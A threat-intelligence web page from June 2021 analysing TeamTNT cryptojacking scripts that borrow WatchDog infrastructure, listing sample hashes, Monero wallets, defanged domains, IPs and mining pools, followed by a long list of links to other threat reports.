Cyber Threat

TeamTNT Using WatchDog TTPs to Expand Its Cryptojacking Footprint

ArrowArrow

June 10, 2021

There are two samples that show the evolution of TeamTNT techniques to mimic WatchDog operations, 36ca9f84864ad022c255b7d91e75997f035716e4df5dc1c90ee2651f092f5d79 and 49366ae4766492d94136ca1f715a37554aa6243686c66bf3c6fbb9da9cb2793d.
These samples, first witnessed on Dec. 5 and 11, 2020 respectively, show the direct replacement of the known WatchDog C2 infrastructure with new C2 infrastructure.
It’s unknown why TeamTNT would not have completely removed the previous C2 infrastructure from the script to avoid leaving such an obvious breadcrumb.
It is a possibility that these malware samples are simply proofs of concept (PoCs) in hijacking another group’s infrastructure.
The new script also makes use of the exact URL address directory tree pattern that is present within the known WatchDog operations, with the directories b2f628 and b2f628fff19fda999999999.
These two samples contain a hardcoded Monero (XMR) wallet address and an associated mining pool.

If these changes are indeed new TeamTNT behaviors, it would represent the first time the TeamTNT cryptojacking operations have used a mining pool outside their traditional Monero mining pool, MoneroOcean[.]stream.
This cryptojacking operation introduces two new mining pools never before known to be used by TeamTNT actors.
These mining pools are nanopool[.]org, and f2pool[.]com. The new mining pools are both instructed to use the Monero wallet address, 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.

Samples contain instructions to find and remove any processes using the TeamTNT-identified 43XB Monero wallet address.
The scripts will then rebuild mining operations and begin using two known WatchDog Monero wallet addresses,

82etS8QzVhqdiL6LMbb85BdEC3KgJeRGT3X1F3DQBnJa2tzgBJ54bn4aNDjuWDtpygBsRqcfGRK4gbbw3xUy3oJv7TwpUG4 and 87q6aU1M9xmQ5p3wh8Jzst5mcFfDzKEuuDjV6u7Q7UDnAXJR7FLeQH2UYFzhQatde2WHuZ9LbxRsf3PGA8gpnGXL3G7iWMv.
These two Monero wallets are just two of the three known Monero wallets that are associated with the WatchDog cryptojacking group. Of note, the IP address listed as 139.99.102[.]72, resolves to the previously mentioned xmr-asia1.nanopool[.]org mining pool.
The URL addresses, email address and Monero wallet specifically called out within the sample 36bf7b2ab7968880ccc696927c03167b6056e73043fd97a33d2468383a5bafce, are known TeamTNT indicators.
This includes the email address [email protected][.]red as well as the Monero wallet address 87A5fSCR98nFSR9NCRxt6UFytca3hJXaRdDgf9NxhWTjT3q3AA8HECyZ1FdF93D5LPXsSqS8dKNsxCxafrbuVeZfMW3V7ib.

The URL addresses, email address and Monero wallet specifically called out within the sample 36bf7b2ab7968880ccc696927c03167b6056e73043fd97a33d2468383a5bafce are known TeamTNT indicators.

Now to the malware sample, 8adc8be4b7fa2f536f4479fa770bf4024b26b6838f5e798c702e4a7a9c1a48c6, which contains the new WatchDog Monero wallet.
The same MOxmrigMOD URL address as the known TeamTNT IoC is present, but in this sample we also see additional URL addresses that have very strong ties to the TeamTNT infrastructure, specifically those involving the domain name oracle.zzhreceive[.]top.

The malware sample, 8adc8be4b7fa2f536f4479fa770bf4024b26b6838f5e798c702e4a7a9c1a48c6, contains the new WatchDog Monero wallet.
With the presence of the C2 infrastructure from these new scripts, both of which use the WatchDog directory, b2f628, there is a clear link to the TeamTNT infrastructure.
The domain oracle.zzhreceive[.]top resolves to the IP address 199.19.226[.]117, which is also the resolution IP address for the known TeamTNT subdomain zzhrecieve.anondns[.]net.


Sign Up For The Threat Alerts

Receive a daily email with important information and simple remediation tips.

Loading...

More Threats

TeamTNT Using WatchDog TTPs to Expand Its Cryptojacking Footprint

Jun 10, 2021

Researchers have identified indicators traditionally pointing to the WatchDog cryptojacking group, which have been incorporated in the tactics, techniques and procedures (TTPs) used by the TeamTNT ...

TeamTNT Using WatchDog TTPs to Expand Its Cryptojacking Footprint

Jun 10, 2021

Researchers have identified indicators traditionally pointing to the WatchDog cryptojacking group, which have been incorporated in the tactics, techniques and procedures (TTPs) used by the TeamTNT ...

TeamTNT Using WatchDog TTPs to Expand Its Cryptojacking Footprint

Jun 10, 2021

Researchers have identified indicators traditionally pointing to the WatchDog cryptojacking group, which have been incorporated in the tactics, techniques and procedures (TTPs) used by the TeamTNT ...

TeamTNT Using WatchDog TTPs to Expand Its Cryptojacking Footprint

Jun 10, 2021

Researchers have identified indicators traditionally pointing to the WatchDog cryptojacking group, which have been incorporated in the tactics, techniques and procedures (TTPs) used by the TeamTNT ...

PuzzleMaker attacks with Chrome zero-day exploit chain

Jun 09, 2021

Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windo...

PuzzleMaker attacks with Chrome zero-day exploit chain

Jun 09, 2021

Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windo...

Hydromac

Jun 08, 2021

The chain of different stages has become very complex nowadays and the analysis phase takes more time, due to the 'malware authors' understanding of how reverse engineering is being done, but also ...

Hydromac

Jun 08, 2021

The chain of different stages has become very complex nowadays and the analysis phase takes more time, due to the 'malware authors' understanding of how reverse engineering is being done, but also ...

OSX/Hydromac

Jun 08, 2021

The chain of different stages has become very complex nowadays and the analysis phase takes more time, due to the 'malware authors' understanding of how reverse engineering is being done, but also ...

OSX/Hydromac

Jun 08, 2021

The chain of different stages has become very complex nowadays and the analysis phase takes more time, due to the 'malware authors' understanding of how reverse engineering is being done, but also ...

SharpPanda: Chinese APT Group Targets Southeast Asian Government

Jun 07, 2021

Check Point Research identified an ongoing surveillance operation targeting a Southeast Asian government. The attackers use spear-phishing to gain initial access and leverage old Microsoft Office ...

Necro Python bot adds new exploits and Tezos mining to its bag of tricks

Jun 06, 2021

Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command and control (C2) communications and the addition ...

Docker Honeypot Reveals Cryptojacking as Most Common Cloud Threat

Jun 03, 2021

There is a honeypot that mimics a misconfigured Docker daemon and explore the data obtained between March and April 2021, including 33 different kinds of attacks with a total of 850 attacks. More...

US seizes domains used by APT29 in recent USAID phishing attacks

Jun 02, 2021

The US Department of Justice has seized two Internet domains used in recent phishing attacks impersonating the U.S. Agency for International Development (USAID) to distribute malware and gain acces...

APT Actors Exploiting Fresh Fortinet Vulnerabilities

Jun 01, 2021

The FBI published information about the continuous exploitation of Fortinet FortiOS vulnerabilities in attacks targeting commercial, government, and technology services networks. In early April,...

A new ransomware enters the fray-Epsilon Red

May 31, 2021

In the past week, analysts uncovered a new ransomware written in the Go programming language that calls itself Epsilon Red. The malware was delivered as the final executable payload in a hand-con...

New sophisticated email-based attack from NOBELIUM

May 30, 2021

A wide-scale malicious email campaign operated by NOBELIUM, was uncovered. NOBELIUM-the threat actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, GoldMax malware,...

TeamTNT targets Kubernetes, nearly 50.000 IPs Compromised in Worm-like Attack

May 27, 2021

Kubernetes is the most widely adopted container orchestration platform for automating the deployment, scaling, and management of containerized applications. Unfortunately, like any widely used ap...

Apostle Wiper to ransomware – striking targets in Israel

May 26, 2021

Dubbed Apostle, never-before-seen wiper masquerades as ransomware. Researchers say they have uncovered never-before-seen disk-wiping malware that is disguising itself as ransomware as it unleash...

MountLocker ransomware uses Windows API to worm through networks

May 25, 2021

The MountLocker ransomware operation now uses enterprise Windows Active Directory APIs to worm through networks. MountLocker started operating in July 2020 as a Ransomware-as-a-Service (RaaS) wh...

BazarCall Method: Call Centers Help Spread BazarLoader Malware

May 24, 2021

BazarLoader (sometimes referred to as BazaLoader) is malware that provides backdoor access to an infected Windows host. After a client is infected, criminals use this backdoor access to send follo...

Threat Actors Use MSBuild to Deliver RATs Filelessly

May 23, 2021

A campaign was discovered, in which threat actors used Microsoft Build Engine (MSBuild) to filelessly deliver Remcos remote access tool (RAT) and password-stealing malware commonly known as RedLine...

AHK RAT loader in unique delivery campaigns

May 20, 2021

There is a unique and ongoing RAT delivery campaign that started in February of this year. This campaign is unique in that it heavily uses the AutoHotKey scripting language-a fork of the AutoIt l...

Snip3 – A Highly Evasive RAT Loader

May 19, 2021

Morphisec has recently monitored a highly sophisticated Crypter-as-a-Service that delivers numerous RAT families onto target machines. The Crypter is most commonly delivered through phishing ema...

Bizarro banking Trojan expands its attacks to Europe

May 18, 2021

Bizarro is yet another banking Trojan family originating from Brazil that is now found in other regions of the world. Users are being targeted in Spain, Portugal, France and Italy. Attempts hav...

Transparent Tribe APT expands its Windows malware arsenal

May 16, 2021

Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations. Cisco T...

Lemon Duck spreads its wings-Actors target Microsoft Exchange servers and incorporate new TTPs

May 13, 2021

Since April 2021, researchers have observed updated infrastructure and new components associated with the Lemon Duck cryptocurrency mining botnet that target unpatched Microsoft Exchange Servers an...

The Linux side of Darkside

May 12, 2021

A new sample of Darkside was found, this time it is a linux variant. Darkside develops their ransomwares to support both Windows and Linux regularly. It is unknown if this variant was the one t...

Proxylogon: A Coinminer, a Ransomware, and a Botnet Join the Party

May 11, 2021

The emergence of several zero-day exploits relating to ProxyLogon, a Microsoft Exchange Server vulnerability that was discovered in late 2020, has allowed several threat actors to carry out attacks...

Cybergang US Pipeline attack identified as DarkSide

May 10, 2021

DarkSide is among ransomware gangs that have "professionalized" a criminal industry that has cost Western nations billions of dollars in losses. The cyberextortion attempt that has forced the sh...

The UNC2529 Triple Double-A Trifecta Phishing Campaign

May 09, 2021

Trifecta Phishing campaign started with 28 organizations that phishing emails were sent to, though targeting was likely broader than directly observed. These emails were sent using 26 unique ema...

Codecov starts notifying customers affected by supply-chain attack

May 06, 2021

As of a few hours ago, Codecov has started notifying the maintainers of software repositories affected by the recent supply-chain attack. These notifications, delivered via both email and the Code...

PortDoor New Chinese APT Backdoor

May 05, 2021

The Cybereason Nocturnus Team has been tracking recent developments in the RoyalRoad weaponizer, also known as the 8.t Dropper/RTF exploit builder. Over the years, this tool has become a part of t...

New Variant of Buer Loader Written in Rust

May 04, 2021

Proofpoint researchers identified a new variant of the Buer malware loader distributed via emails masquerading as shipping notices in early April. Buer is a downloader sold on underground marketpl...

UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat

May 03, 2021

An aggressive financially motivated group, UNC2447, exploiting one SonicWall VPN zero-day vulnerability prior to a patch being available and deploying sophisticated malware previously reported by o...

N3tw0rm ransomware attack against organizations in Israel

May 02, 2021

The malicious actors behind it may be connected to previous campaigns of Pay2Key. This is a wave of ransomware attacks from a specfic group, identified as N3tw0rm. They use "commercial identity...

Hello Ransomware Uses Updated China Chopper Web Shell, SharePoint Vulnerability

Apr 29, 2021

In January, appeared a new ransomware using .hello as its extension in one of our cases that possibly arrived via a SharePoint server vulnerability. This appeared to be a new ransomware family du...

Phorpiex a multi purpose malware

Apr 28, 2021

Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, from malware to sending spam emails, to ransomware and c...

Shlayer malware abusing Gatekeeper bypass on macOS

Apr 27, 2021

Shlayer malware detected allows an attacker to bypass Gatekeeper, Notarization and File Quarantine security technologies in macOS. The exploit allows unapproved software to run on Mac and is dist...

Emotet malware nukes itself today from all infected computers worldwide

Apr 26, 2021

Emotet, one of the most dangerous email spam botnets in recent history, is being uninstalled from all infected devices with the help of a malware module delivered in January by law enforcement. ...

New cryptomining malware builds an army of Windows, Linux bots

Apr 25, 2021

A recently discovered cryptomining botnet is actively scanning for vulnerable Windows and Linux enterprise servers and infecting them with Monero (XMRig) miner and self-spreader malware payloads. ...

HabitsRAT Used to Target Linux and Windows Servers

Apr 22, 2021

A new malware written in Go, which is called HabitsRAT, targeting both Windows and Linux machines, was discovered recently. The Windows version of the malware was first reported on in attacks aga...

Lazarus APT Hackers are now using BMP images to hide RAT malware

Apr 21, 2021

Spear-phishing attack operated by a North Korean threat actor targeting its southern counterpart has been found to conceal its malicious code within a bitmap (.BMP) image file to drop a remote acce...

Malware That Spreads Via Xcode Projects Now Targeting Apple M1-based Macs

Apr 20, 2021

Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSS...

New FormBook Variant Delivered in Phishing Campaign

Apr 18, 2021

Researches have recently captured a phishing campaign that was sending a Microsoft PowerPoint document as an email attachment to spread the new variant of the FormBook malware. FormBook is a well...

Iran’s APT34 Returns with an Updated Arsenal

Apr 13, 2021

Check Point Research discovered evidence of a new campaign by the Iranian threat group APT34 (aka OilRig), against what appears to be a Lebanese target, employing a new backdoor variant that was du...

Saint Bot downloader

Apr 12, 2021

In late March 2021, Malwarebytes analysts discovered a phishing email with an attached zip file containing unfamiliar malware. Contained within the zip file was a PowerShell script masquerading as...

Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware

Apr 11, 2021

It was found a sample that we identified as one belonging to the SysUpdate malware family, also named Soldier, FOCUSFJORD, and HyperSSL. SysUpdate was first described by the NCC Group in 2018. ...

The leap of a Cycldek-related threat actor

Apr 08, 2021

In the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous "DLL side-loading triad": a legitimate exe...

SynAck Ransomware Leverages Process Doppelganging for Evasion and Infection

Apr 06, 2021

SynAck ransomware family is the first to use Process Doppelganging to bypass known security solutions. While SynAck was discovered in September 2017 and Process Doppelganging presented in Decembe...

Phishing Trends With PDF Files

Apr 06, 2021

Palo Alto Networks noticed a dramatic 1,160% increase in malicious PDF files - from 411,800 malicious files to 5,224,056. PDF files are an enticing phishing vector as they are cross-platform and a...

Hancitor’s Use of Cobalt Strike and a Noisy Network Ping Tool

Apr 05, 2021

Hancitor is an information stealer and malware downloader used by a threat actor designated as MAN1, Moskalvzapoe or TA511. Hancitor remains a threat and has evolved to use tools like Cobalt Str...

Malware hidden in game cheats and mods used to target gamers

Apr 04, 2021

Threat actors target gamers with backdoored game tweaks, patches, and cheats hiding malware capable of stealing information from infected systems. The attackers mostly use social media channels ...

BazarCall malware uses malicious call centers to infect victims

Apr 01, 2021

The new malware was discovered being distributed by call centers in late January and is named BazarCall. Like many malware campaigns, BazarCall starts with a phishing email but from there deviates...

Anchor DNS strikes again

Mar 31, 2021

The AnchorDNS malware performs C2 over DNS to two specific domains The malware identified as Anchor first entered the scene in late 2018 and has been linked to the same group as Trickbot, due to...

New Pay2Decrypt variant

Mar 30, 2021

New Pay2Decrypt variant that appends the .aes and .lck extension, encrypts target files with AES+RSA and demands a ransom of 0.0002 BTC. Originally written on AutoIt.

FatFace hit by Conti ransomware

Mar 29, 2021

British clothing brand FatFace has sent a controversial 'confidential' data breach notification to customers after suffering a ransomware attack. Customers began receiving data breach notificati...

CopperStealer Performs Widespread Theft

Mar 25, 2021

Investigation uncovered an actively developed password and cookie stealer with a downloader function, capable of delivering additional malware after performing stealer activity. The earliest dis...

Black Kingdom ransomware Targets MS Exchange servers

Mar 24, 2021

Another ransomware operation known as 'Black Kingdom' is exploiting the Microsoft Exchange Server ProxyLogon vulnerabilities to encrypt servers. Over the weekend, security researcher Marcus Hutc...

Acer hit by 50 million dollar REvil ransomware

Mar 22, 2021

Computer giant Acer has been hit by a REvil ransomware attack where the threat actors are demanding the largest known ransom to date, $50,000,000. Acer is a Taiwanese electronics and computer ma...

New macOS malware Targets Xcode Developers

Mar 21, 2021

Threat actors are abusing the Run Script feature in Apple's Xcode IDE to infect unsuspecting Apple Developers via shared Xcode Projects. XcodeSpy is a malicious Xcode project that installs a custo...

NimzaLoader is a New Initial Access Malware

Mar 18, 2021

The TA800 threat actor has predominantly used BazaLoader since April of 2020, but on February 3rd, 2021 they distributed a new malware named NimzaLoader. One of NimzaLoader's distinguishing featu...

Pysa ransomware attacks on education organizations

Mar 17, 2021

The Federal Bureau of Investigation (FBI) Cyber Division has warned system administrators and cybersecurity professionals of increased Pysa ransomware activity targeting educational institutions.

Dharma ransomware keeps on being spread

Mar 15, 2021

Researchers keep noticing more and more new Dharma variants.